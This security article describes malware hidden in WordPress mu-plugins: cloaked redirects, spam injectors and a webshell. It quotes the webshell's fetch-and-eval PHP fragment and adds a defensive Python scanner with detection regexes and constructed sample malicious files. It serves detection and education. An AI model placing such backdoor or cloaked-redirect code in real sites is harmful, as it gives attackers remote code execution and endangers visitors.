Recent discoveries have uncovered a concerning trend where threat actors are strategically concealing malicious code within WordPress websites’ mu-plugins directory.
This directory is particularly valuable for attackers as it loads automatically with WordPress, making detection and removal more challenging.
The malware variants discovered employ sophisticated techniques to maintain persistence while executing harmful functions ranging from user redirection to complete website takeovers.
The attacks target the mu-plugins folder with multiple malware types that appear legitimate but contain malicious code.
These include redirect scripts that send unsuspecting visitors to harmful domains, webshells that provide attackers with remote code execution capabilities, and spam injectors that manipulate website content to distribute unwanted material.
Sucuri researchers detected that these malware variants are carefully designed to avoid detection by excluding search engine crawlers and privileged users from seeing malicious behavior.
Their analysis revealed that the attackers are employing increasingly sophisticated techniques to ensure their malware remains hidden while maximizing its impact on targeted websites.
Websites infected with these malicious scripts suffer from multiple consequences, including reputation damage, potential data theft, malware distribution to visitors, and unauthorized website modifications.
The most damaging variant allows attackers to establish persistent access to the compromised website, creating a foundation for long-term exploitation.
Webshell Analysis: Remote Code Execution Capabilities
The most concerning variant discovered is a webshell disguised as a legitimate WordPress plugin file placed in the wp-content/mu-plugins/index.php location.
This webshell contains code designed to download and execute remote PHP scripts (excerpt):

    if (curl_errno($connectionHandle)) {
        die('cURL error occurred: ' . curl_error($connectionHandle));
    }
    curl_close($connectionHandle);
    eval("?>" . $retrievedCode);
This snippet demonstrates how the malware uses PHP’s eval() function to execute arbitrary code fetched from a remote server.
The approach allows attackers to run commands with the same privileges as the web server, potentially leading to complete website compromise.
Once established, this backdoor grants attackers the ability to upload files, delete content, and access sensitive information, turning the compromised website into a platform for launching further attacks against visitors and connected systems.
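Because everything in mu-plugins loads on every request without needing activation, the practical defender's check is to inventory that directory and flag files that show the two behaviours the article describes: eval() of code fetched or unpacked at runtime (the webshell), and redirects that hide from crawlers or logged-in users (the cloaked redirect and spam variants). The following scanner is an added example written for this article; it is not Sucuri's tooling, the signature names and risk weighting are my own assumptions, and the three sample files it scans are constructed stand-ins for a real wp-content/mu-plugins directory (the "webshell" sample only mirrors the fragment quoted above and is not a working shell).

```python
"""Heuristic scanner for a WordPress mu-plugins directory (added example)."""
import os
import re
import tempfile
from typing import Dict, List

# Regex signatures for behaviours the article describes. Names and weighting are
# assumptions made for this example, not a published rule set.
SIGNATURES: Dict[str, re.Pattern] = {
    "eval_call":    re.compile(r"\beval\s*\(", re.I),
    "remote_fetch": re.compile(r"\bcurl_exec\s*\(|\b(?:file_get_contents|fopen)\s*\(\s*['\"]https?://", re.I),
    "decode_layer": re.compile(r"\b(?:base64_decode|gzinflate|gzuncompress|str_rot13)\s*\(", re.I),
    "admin_cloak":  re.compile(r"\b(?:current_user_can|is_user_logged_in|is_admin)\s*\(", re.I),
    "redirect":     re.compile(r"\bheader\s*\(\s*['\"]Location:", re.I),
}
CRAWLER_NAMES = re.compile(r"googlebot|bingbot|crawler|spider", re.I)


def find_hits(src: str) -> List[str]:
    """Return the sorted list of signature names that fire on one PHP source string."""
    hits = [name for name, pat in SIGNATURES.items() if pat.search(src)]
    # Crawler cloaking: the script reads the User-Agent and compares it against crawler
    # names so that search engines never observe the malicious branch.
    if "HTTP_USER_AGENT" in src and CRAWLER_NAMES.search(src):
        hits.append("crawler_cloak")
    return sorted(hits)


def classify(hits: List[str]) -> str:
    """Map the hits for one file to a coarse risk level."""
    h = set(hits)
    if "eval_call" in h and h & {"remote_fetch", "decode_layer"}:
        return "high"    # executes code fetched or unpacked at runtime: the webshell shape
    if "redirect" in h and h & {"crawler_cloak", "admin_cloak"}:
        return "high"    # redirects visitors while hiding from crawlers or logged-in users
    if h & {"eval_call", "remote_fetch", "crawler_cloak"}:
        return "medium"  # worth a manual look; legitimate code occasionally uses these
    return "low" if h else "none"


def scan_mu_plugins(mu_dir: str) -> List[Dict[str, object]]:
    """Scan every .php file under mu_dir; mu-plugins auto-load, so every file counts."""
    results = []
    for root, _dirs, files in os.walk(mu_dir):
        for name in files:
            if not name.lower().endswith(".php"):
                continue
            path = os.path.join(root, name)
            with open(path, encoding="utf-8", errors="replace") as fh:
                hits = find_hits(fh.read())
            results.append({"file": os.path.relpath(path, mu_dir),
                            "hits": hits, "risk": classify(hits)})
    return sorted(results, key=lambda r: r["file"])


# Constructed sample files standing in for a real wp-content/mu-plugins directory.
SAMPLE_FILES = {
    # shape of the webshell fragment quoted in the article (not a working shell)
    "index.php": "<?php\n$retrievedCode = curl_exec($connectionHandle);\n"
                 "curl_close($connectionHandle);\neval(\"?>\" . $retrievedCode);\n",
    # cloaked redirect: skips crawlers and logged-in users, as the article describes
    "seo-helper.php": "<?php\nif (!preg_match('/googlebot|bingbot/i', $_SERVER['HTTP_USER_AGENT'])"
                      " && !is_user_logged_in()) {\n    header('Location: http://example.invalid/');"
                      "\n    exit;\n}\n",
    # ordinary site customisation that must not be flagged
    "site-tweaks.php": "<?php\n/* Plugin Name: Site Tweaks */\n"
                       "add_filter('show_admin_bar', '__return_false');\n",
}


def build_sample_site() -> str:
    """Write the constructed samples into a temp directory and return its path."""
    mu_dir = tempfile.mkdtemp(prefix="mu-plugins-")
    for name, body in SAMPLE_FILES.items():
        with open(os.path.join(mu_dir, name), "w", encoding="utf-8") as fh:
            fh.write(body)
    return mu_dir


if __name__ == "__main__":
    for r in scan_mu_plugins(build_sample_site()):
        print(f"{r['risk']:6} {r['file']:18} {', '.join(r['hits']) or '-'}")
```

On a live site, point scan_mu_plugins at the real wp-content/mu-plugins path and treat any "high" result, or any file you do not recognise, as something to pull for manual review; pairing the scan with a comparison of file modification times against your deployment history catches the same class of implant even when the signatures miss it.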